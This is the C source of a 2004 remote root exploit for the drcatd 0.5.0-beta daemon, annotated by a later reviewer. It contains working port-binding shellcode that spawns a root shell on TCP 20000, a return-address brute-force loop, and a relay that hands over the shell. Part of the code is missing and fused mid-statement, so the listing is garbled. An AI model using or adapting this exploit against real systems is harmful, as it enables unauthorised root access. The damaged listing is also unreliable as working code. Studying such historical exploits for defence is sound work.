/* Proof of Concept DRCATD Remote exploit by Taif __ Test: [root@localhost drcat]# ./drcat -d 127.0.0.1 -u taif -p test Public code by Taif drcat-0.5.0-beta ('remote r00t' proof) Bug found by Khan Shirani host: +-+-+-+-+-+-+-+ 127.0.0.1 |C|L|U|P|C|S|R| user: |O|O|S|A|O|E|O| taif |O|G|E|S|D|N|O| password: |N|O|R|S|E|D|T| test | | | | | | | | ---------retaddr---+-+-+-+-+-+-+-+ bfefc000 * * * * * * X bfefbfd1 * * * * * * X bfefbfa2 * * * * * * X bfefbf73 * * * * * * X bfefbf44 * * * * * * X bfefbf15 * * * * * * X bfefbee6 * * * * * * X bfefbeb7 * * * * * * X bfefbe88 * * * * * * X bfefbe59 * * * * * * X bfefbe2a * * * * * * X bfefbdfb * * * * * * X bfefbdcc * * * * * * X bfefbd9d * * * * * * X bfefbd6e * * * * * * X bfefbd3f * * * * * * X bfefbd10 * * * * * * X bfefbce1 * * * * * * X bfefbcb2 * * * * * * X bfefbc83 * * * * * * X bfefbc54 * * * * * * X bfefbc25 * * * * * * X bfefbbf6 * * * * * * X bfefbbc7 * * * * * * X bfefbb98 * * * * * * X bfefbb69 * * * * * * X bfefbb3a * * * * * * X bfefbb0b * * * * * * X bfefbadc * * * * * * X bfefbaad * * * * * * X bfefba7e * * * * * * X bfefba4f * * * * * * X bfefba20 * * * * * * X bfefb9f1 * * * * * * X bfefb9c2 * * * * * * X bfefb993 * * * * * * X bfefb964 * * * * * * X bfefb935 * * * * * * X bfefb906 * * * * * * X bfefb8d7 * * * * * * X bfefb8a8 * * * * * * X bfefb879 * * * * * * X bfefb84a * * * * * * X bfefb81b * * * * * * X bfefb7ec * * * * * * X bfefb7bd * * * * * * X bfefb78e * * * * * * X bfefb75f * * * * * * X bfefb730 * * * * * * X bfefb701 * * * * * * X bfefb6d2 * * * * * * X bfefb6a3 * * * * * * X bfefb674 * * * * * * X bfefb645 * * * * * * X bfefb616 * * * * * * X bfefb5e7 * * * * * * X bfefb5b8 * * * * * * X bfefb589 * * * * * * X bfefb55a * * * * * * X bfefb52b * * * * * * X bfefb4fc * * * * * * * * HAVE FUN * HAVE FUN * HAVE FUN * HAVE FUN * HAVE FUN * Linux localhost.localdomain 2.4.26 #9 P ?ec 2 09:20:29 CEST 2004 i686 athlon i386 GNU/Linux uid=500(taif) gid=500(taif) groups=500(taif) 10:04pm up 1:00, 1 user, 
load average: 0.42, 0.35, 0.20 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT ....

   NOTE: Use this at your own risk!!  This exploit is unnecessary!!

   NOTE(review): this is a 2004 milw0rm proof-of-concept against drcatd
   0.5.0-beta.  The listing appears to have been recovered from HTML and the
   recovery is lossy:
     - the three #include directives below lost their header names (the
       angle-bracketed text was stripped), so the file no longer preprocesses
       as shown;
     - a span of code is missing between the `for (i=0;i` of makec0de() and
       the `> sock )` of sh(): the rest of makec0de(), all of send_it()
       (which main() calls), and the head of sh() that declares snd, rcv,
       rset, maxfd, n and received.
   Nothing in those gaps has been reconstructed.  Every surviving token is
   kept verbatim; only comments were added.  The transcript above shows the
   intended flow: log in, send a payload built around one candidate return
   address, wait, then test whether a shell is now listening on TCP 20000. */

#include /* header name lost in extraction -- presumably <stdio.h> / <stdlib.h>; confirm against an intact copy */
#include /* header name lost in extraction -- presumably <string.h> / <unistd.h>; confirm */
#include /* header name lost in extraction -- presumably <netdb.h> / <sys/socket.h> / <netinet/in.h>; confirm */

/* Size of the payload buffer main() hands to makec0de(), and the base of the
 * return-address search (see the initialisation of ret in main()). */
#define MAXDATASIZE (1024 * 4)

/* Colour palette: ANSI SGR escape sequences; RESTORE resets attributes.
 * (\E is a GCC extension for ESC.) */
#define YELLOW "\E[33m"
#define GREEN "\E[32m"
#define RED "\E[31m"
#define RESTORE "\E[0m"

/* NOTE(review): each PRINT* macro expands to TWO statements (printf; fflush;)
 * and is not wrapped in do { } while (0).  So `else PRINTGREEN("* ");` in
 * main() only guards the printf -- the fflush runs unconditionally.  Harmless
 * there, but a trap if one of these is ever placed under an unbraced if/else
 * with a following statement. */
#define PRINTGREEN(string) \
printf("%s%s%s",GREEN,string,RESTORE); \
fflush(stdout);
#define PRINTRED(string) \
printf("%s%s%s",RED,string,RESTORE); \
fflush(stdout);
#define PRINTYELLOW(string) \
printf("%s%s%s",YELLOW,string,RESTORE); \
fflush(stdout);

/* portbind 20000 (by bighawk)
 *
 * +setuid()
 *
 * NOTE(review): reading the bytes with the author's annotations: setuid(0)
 * via syscall 0x17 with ebx=0, then socket/bind/listen/accept through
 * socketcall (al=102) on TCP port 20000 (the word 0x4e 0x20 pushed below is
 * 20000 in network byte order; main() later connects to that port), dup2()
 * of the accepted fd over descriptors 2..0, and execve() of "//bin/sh" (the
 * two dword pushes spell "n/sh" and "//bi").  101 bytes including the
 * terminating NUL, which is what main() relies on via sizeof(code). */
char code[] =
    "\x31\xc0"              /* xorl %eax,%eax */
    "\x31\xdb"              /* xorl %ebx,%ebx */
    "\xb0\x17"              /* movb $0x17,%al   -- setuid */
    "\xcd\x80"              /* int $0x80 */
    "\x31\xdb"              /* xor ebx, ebx */
    "\xf7\xe3"              /* mul ebx          -- eax = edx = 0 */
    "\xb0\x66"              /* mov al, 102      -- socketcall */
    "\x53"                  /* push ebx */
    "\x43"                  /* inc ebx */
    "\x53"                  /* push ebx */
    "\x43"                  /* inc ebx */
    "\x53"                  /* push ebx */
    "\x89\xe1"              /* mov ecx, esp */
    "\x4b"                  /* dec ebx          -- SYS_SOCKET */
    "\xcd\x80"              /* int 80h */
    "\x89\xc7"              /* mov edi, eax     -- keep the listening fd */
    "\x52"                  /* push edx */
    "\x66\x68\x4e\x20"      /* push word        -- bytes 4e 20 = port 20000, network order */
    "\x43"                  /* inc ebx */
    "\x66\x53"              /* push bx          -- AF_INET */
    "\x89\xe1"              /* mov ecx, esp */
    "\xb0\xef"              /* mov al, 239 */
    "\xf6\xd0"              /* not al           -- 16 = sizeof(sockaddr_in) */
    "\x50"                  /* push eax */
    "\x51"                  /* push ecx */
    "\x57"                  /* push edi */
    "\x89\xe1"              /* mov ecx, esp */
    "\xb0\x66"              /* mov al, 102      -- socketcall: bind */
    "\xcd\x80"              /* int 80h */
    "\xb0\x66"              /* mov al, 102      -- socketcall: listen */
    "\x43"                  /* inc ebx */
    "\x43"                  /* inc ebx */
    "\xcd\x80"              /* int 80h */
    "\x50"                  /* push eax */
    "\x50"                  /* push eax */
    "\x57"                  /* push edi */
    "\x89\xe1"              /* mov ecx, esp */
    "\x43"                  /* inc ebx */
    "\xb0\x66"              /* mov al, 102      -- socketcall: accept */
    "\xcd\x80"              /* int 80h */
    "\x89\xd9"              /* mov ecx, ebx */
    "\x89\xc3"              /* mov ebx, eax     -- accepted fd */
    "\xb0\x3f"              /* mov al, 63       -- dup2 */
    "\x49"                  /* dec ecx */
    "\xcd\x80"              /* int 80h */
    "\x41"                  /* inc ecx */
    "\xe2\xf8"              /* loop lp          -- dup2 over 2, 1, 0 */
    "\x51"                  /* push ecx */
    "\x68\x6e\x2f\x73\x68"  /* push dword 68732f6eh  -- "n/sh" */
    "\x68\x2f\x2f\x62\x69"  /* push dword 69622f2fh  -- "//bi" */
    "\x89\xe3"              /* mov ebx, esp */
    "\x51"                  /* push ecx */
    "\x53"                  /* push ebx */
    "\x89\xe1"              /* mov ecx, esp */
    "\xb0\xf4"              /* mov al, 244 */
    "\xf6\xd0"              /* not al           -- 11 = execve */
    "\xcd\x80";             /* int 80h */

/* Print the credit banner to stderr.  (Old-style empty parameter list.) */
void banner() {
    fprintf(stderr,"Public code by Taif \n"
            "drcat-0.5.0-beta (\'remote r00t\' proof)\n"
            "Bug found by Khan Shirani \n\n");
}

/* Print the option summary to stderr and exit(0).  progname is argv[0].
 * NOTE(review): i is declared but never used; "hostanme" is a typo inside a
 * runtime string and is left untouched here. */
void usage (char *progname) {
    int i;
    fprintf (stderr, "usage: %s arguments \n\n"
             "-d hostanme (127.0.0.1) \n"
             "-u user (NULL) \n"
             "-p password (NULL) \n"
             "-P port (3535) \n"
             "-t timeout (1000=1s) (300) \n"
             "\n", progname);
    exit (0);
}

/* Resolve ip (host name or dotted quad) and open a TCP connection to port.
 * Returns the connected socket, or -1 if connect() fails.  Resolver and
 * socket() failures do not return: they print a marker and exit(1).
 *
 * NOTE(review): on the connect() failure path the descriptor is not closed
 * before returning -1, so every failed probe of port 20000 in main()'s loop
 * leaks one fd; over a long brute force this would exhaust the descriptor
 * table and turn into the exit(1) in the socket() branch.  gethostbyname()
 * is obsolete; getaddrinfo() is the modern replacement. */
int conn(char *ip,int port) {
    int sock;
    struct hostent *host;
    struct sockaddr_in addr;
    if((host=gethostbyname(ip))==NULL) {
        PRINTRED("X\ngethostbyname()\n");
        exit(1);
    }
    addr.sin_family=AF_INET;
    addr.sin_port=htons(port);
    addr.sin_addr=*((struct in_addr *)host->h_addr);
    memset(&(addr.sin_zero),0,8);
    if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1) {
        PRINTRED("X\nsocket()\n");
        exit(1);
    }
    if(connect(sock,(struct sockaddr *)&addr,sizeof(struct sockaddr))==-1) {
        PRINTRED("X\n");
        return(-1);
    }
    return(sock);
}

/* Perform the drcatd login handshake on sock: read a 6-byte greeting, send
 * the user name, read a 1-byte verdict, send the password, read another
 * 1-byte verdict.  A '0' verdict byte is treated as rejection.  Exits the
 * process on rejection or on a send error; returns normally on success.
 *
 * NOTE(review): the protocol details (6-byte "drcatd" banner, '0' = reject)
 * are inferred from this client alone and were not checked against the
 * daemon.  strcmp() on the 6-byte greeting is safe only because buffer was
 * zero-filled and is far larger than 6.  The two verdict reads never look at
 * n: if the peer closes or recv() fails, buffer[0] still holds the previous
 * byte (not '0'), so a dropped session is reported as a successful login. */
void login(int sock,char* user,char *pass) {
    char buffer[1024];
    int n;
    memset(buffer,0,sizeof(buffer));
    n=recv(sock, buffer, 6, 0);
    if(n<0) {
        PRINTRED("\nrecv()\n");
        exit(1);
    }
    /* Yellow marker = greeting was not the expected "drcatd"; green = it was. */
    if(n==6) {
        if(strcmp(buffer, "drcatd")) {PRINTYELLOW("* ");} else {PRINTGREEN("* ");};
    } else {PRINTYELLOW("* ");}
    if(send(sock, user, strlen(user), 0) == -1) {PRINTRED("\nsend()\n");close(sock);exit(1);}
    n=recv(sock, buffer, 1, 0);   /* NOTE(review): n unchecked, see above */
    if(buffer[0] == '0') {
        PRINTRED("X\nINVALID USER\n");
        close(sock);
        exit(1);
    } else {PRINTGREEN("* ")};
    if(send(sock, pass, strlen(pass), 0) == -1) {PRINTRED("send()\n");close(sock);exit(1);}
    n=recv(sock, buffer, 1, 0);   /* NOTE(review): n unchecked, see above */
    if(buffer[0] == '0') {
        PRINTRED("X\nINVALID PASSWORD\n");
        close(sock);
        exit(1);
    }
    return;
}

/* change with care */
#define TOP 290   /* length of the 0x90 (NOP) sled written at the start of the payload */

/* Build the payload in haox (a MAXDATASIZE-byte buffer from main): clear the
 * first 512 bytes and lay down a TOP-byte NOP sled.  What follows -- the
 * loop body and presumably the placement of code[] and the candidate return
 * address ret -- is in the lost span; confirm against an intact copy.
 *
 * NOTE(review): the line below is where the extraction lost text.  It is
 * makec0de()'s original `for (i=0;i` fused with the `> sock )` from sh()'s
 * maxfd computation; everything in between (remainder of makec0de, all of
 * send_it, the head of sh) is gone.  It is kept verbatim so the damage stays
 * visible rather than being papered over with a guess. */
void makec0de(char* haox,unsigned int ret) { int i; memset(haox,0,512); memset(haox,0x90,TOP); for (i=0;i sock )?fileno(stdin):sock ) + 1;

    /* ---- tail of sh(int sock): relay between stdin and the socket, driven by
     * select() on both descriptors.  Its head (declarations of snd, rcv, rset,
     * maxfd, n, received; the FD_ZERO/FD_SET setup; the loop opener) is in the
     * lost span.  It returns int: 0 when the peer closes before sending
     * anything, otherwise it exits the process itself. ---- */
    select(maxfd, &rset, NULL, NULL, NULL);
    if (FD_ISSET(fileno(stdin), &rset)) {
        /* NOTE(review): fgets() and write() results are ignored.  At EOF on
         * stdin, snd stays zeroed, strlen() is 0 and nothing is written, but
         * select() would keep reporting stdin readable -- a busy loop. */
        bzero(snd, sizeof(snd));
        fgets(snd, sizeof(snd)-2, stdin);
        write(sock, snd, strlen(snd));
    }
    if (FD_ISSET(sock, &rset)) {
        bzero(rcv, sizeof(rcv));
        /* NOTE(review): read() may fill all of rcv, leaving no terminator, in
         * which case the fputs() below runs past the end of the buffer.
         * Reading sizeof(rcv)-1 bytes, or writing n bytes with fwrite(), would
         * fix it. */
        if ((n = read(sock, rcv, sizeof(rcv))) == -1) {
            printf("FUCK: Error in read\n");
            exit(1);
        }
        if (!n) {
            /* EOF before any data: return 0 to main() (which ignores it);
             * EOF after data: the shell went away, terminate. */
            if (!received) {
                printf("FUCK: failed.\n\n");
                return 0;
            }
            printf("Connection closed.\n");
            exit(1);
        }
        received = 1;
        fputs(rcv, stdout);
        fflush(stdout);
    }
    }   /* end of the relay loop (its opener is in the lost span) */
}

/* Entry point.  Options: -d host (default 127.0.0.1), -u user, -p password,
 * -P port (3535), -t delay in ms (300); -u and -p are mandatory.  Prints the
 * legend, then brute-forces the return address: each iteration connects, logs
 * in, sends a payload built for the current guess, waits -t milliseconds and
 * tries to connect to TCP 20000.  A successful connect is taken as proof the
 * shellcode ran (anything else already listening on 20000 would be a false
 * positive) and the socket is handed to sh(); otherwise ret is stepped down
 * and the loop repeats.  There is no iteration limit: the loop ends only on
 * success or on a failed connect()/login(), which exit. */
int main(int argc, char *argv[]){
    char buff[MAXDATASIZE];
    /* NOTE(review): c should be int -- getopt() returns int and the -1
     * comparison misbehaves where char is unsigned.  sockfd2 is never used. */
    char *host, *user,*pass,c;
    int sockfd,sockfd2;
    int port = 3535;
    /* Delay between sending the payload and probing the bind port, in
     * milliseconds (see usleep(time*1000) below).  The name shadows time(3)
     * if <time.h> is among the lost includes. */
    int time = 300;
    /* First candidate return address: 0xc0000000 - 4096*260 = 0xbfefc000,
     * the first value printed in the transcript above.
     * NOTE(review): 0xc0000000 does not fit in int, so this initialisation
     * is an implementation-defined conversion, "%16x" below is given an int,
     * and makec0de() takes it back as unsigned int.  Works on i386/gcc, but
     * the variable is really an unsigned quantity. */
    int ret=0xc0000000-(MAXDATASIZE*260);
    host="127.0.0.1";
    user=NULL;
    pass=NULL;
    banner();
    if (argc<2) usage (argv[0]);
    while((c=getopt(argc,argv,"?hd:u:p:P:t:"))!=-1) {
        switch(c) {
        case 't': time=atoi(optarg); break;
        case 'P': port=atoi(optarg); break;
        case 'u': user=optarg; break;
        case 'd': host=optarg; break;
        case 'p': pass=optarg; break;
        case '?':
        case 'h':
        default: usage (argv[0]); break;
        }
    }
    /* host can only be NULL if -d was given an empty pointer; kept as written. */
    if (host==NULL) {PRINTRED("Set host!\n");usage (argv[0]);}
    if (user==NULL) {PRINTRED("Set user!\n");usage (argv[0]);}
    if (pass==NULL) {PRINTRED("Set password!\n");usage (argv[0]);}
    /* Legend: one column per step (CONNECT LOGIN USER PASS CODE SEND ROOT),
     * one row per return-address guess. */
    printf(" host: +-+-+-+-+-+-+-+\n"
           "%16s |C|L|U|P|C|S|R|\n"
           " user: |O|O|S|A|O|E|O|\n"
           "%16s |O|G|E|S|D|N|O|\n"
           " password: |N|O|R|S|E|D|T|\n"
           "%16s | | | | | | | |\n"
           "---------retaddr---+-+-+-+-+-+-+-+\n"
           ,host,user,pass);fflush(stdout);
    while(1) {
        printf("%16x ",ret);fflush(stdout);
        sockfd=conn(host,port);
        /* NOTE(review): PRINTGREEN expands to two statements, so only the
         * printf is under this else; the trailing fflush runs either way. */
        if (sockfd<0) {PRINTRED("connect()\n");exit(1);} else PRINTGREEN("* ");
        login(sockfd,user,pass);PRINTGREEN("* ");
        makec0de(buff,ret);PRINTGREEN("* ");
        send_it(sockfd,buff);PRINTGREEN("* ");   /* send_it() is defined in the lost span */
        close(sockfd);
        usleep(time*1000);
        /* Probe the port the shellcode binds; conn() returns -1 if nothing answers. */
        sockfd=conn(host,20000);
        if (!(sockfd<0)) {
            PRINTGREEN("*\n");
            PRINTGREEN("* HAVE FUN * HAVE FUN * HAVE FUN * HAVE FUN * HAVE FUN *\n");
            sh(sockfd);
            close(sockfd);
            exit(0);
        }
        /* Step the guess down by (TOP - sizeof(code))/4: code[] is 101 bytes
         * including its terminator, so the step is 47 (0x2f), which matches
         * the transcript's bfefc000 -> bfefbfd1 -> bfefbfa2 sequence. */
        ret=ret-((TOP-sizeof(code))/4);
    }
    exit(0);
}
// milw0rm.com [2004-07-22]